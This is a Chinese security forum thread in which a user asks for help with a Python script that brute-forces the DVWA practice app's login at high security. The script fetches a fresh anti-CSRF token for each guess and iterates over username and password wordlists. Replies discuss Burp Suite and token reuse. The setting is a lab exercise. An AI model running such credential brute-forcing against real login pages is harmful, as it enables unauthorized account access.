dvwa暴力破解高难度，使用python bs4攻击，正确的配对响应码不对

ywk66618

from bs4 import BeautifulSoup
import  requests

header = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0',
    'Cookie':'Hm_lvt_d7c7037093938390bc160fc28becc542=1741916419,1741917396; PHPSESSID=4pqq1gtsvidjufpus7posv4jb1; security=high'
}
url="http://192.168.63.135/dvwa/vulnerabilities/brute/index.php"

def get_token(url,headers):
    r=requests.get(url,headers=header)
    print(r.status_code)
    html=r.content.decode()
    #print(len(html))
    soup=BeautifulSoup(html,"html.parser")
    user_token=soup.find_all('input')[3].get('value')
    return user_token


i=0
for admin in open("D:\\pythonzzzzzz\\smalldic_admin.txt"):
    for line in open("D:\\pythonzzzzzz\\smalldic_password.txt"):
        u_token=get_token(url,header)
        username=admin.strip()
        password=line.strip()
        payload={'username':username,'password':password,'login':'登录','user_token':u_token}
        print(payload)
        i=i+1
        response=requests.get(url,params=payload,headers=header)
        print(i,username,password,len(response.content.decode()))
        user_token=get_token(url,header)

netsparker

为什么不使用burpsuite呢？
视频演示：输入密码后稍等一会，打不开再点一次试试。
密码：52pojie

https://enclosed.cc/01jpajkrdb1bcs47498pntgaet#pw:TuyUyeEu9Z_-5VG7g2M5s8aUWxXuO_nBSo8gI9LHYQc

jorying

终于有帐号了，终于能发言了，处女评论！赞赞赞

dkmg

试试仅在发送请求前获取一次有效的 token?

0316

下载看看，好不好用

ywk66618

netsparker 发表于 2025-3-14 22:45
为什么不使用burpsuite呢？
视频演示：
密码：52pojie

尝试用burpsuite正则表达式，response没有html内容，找不到token

ywk66618

dkmg 发表于 2025-3-14 22:00
试试仅在发送请求前获取一次有效的 token?

还是一样的结果

Yohan1988

感觉很厉害

netsparker

ywk66618 发表于 2025-3-14 23:02
尝试用burpsuite正则表达式，response没有html内容，找不到token

第一次的就需要带上token访问，需要一个没使用过的token,还有，你登陆了没有，请求包只能使用一次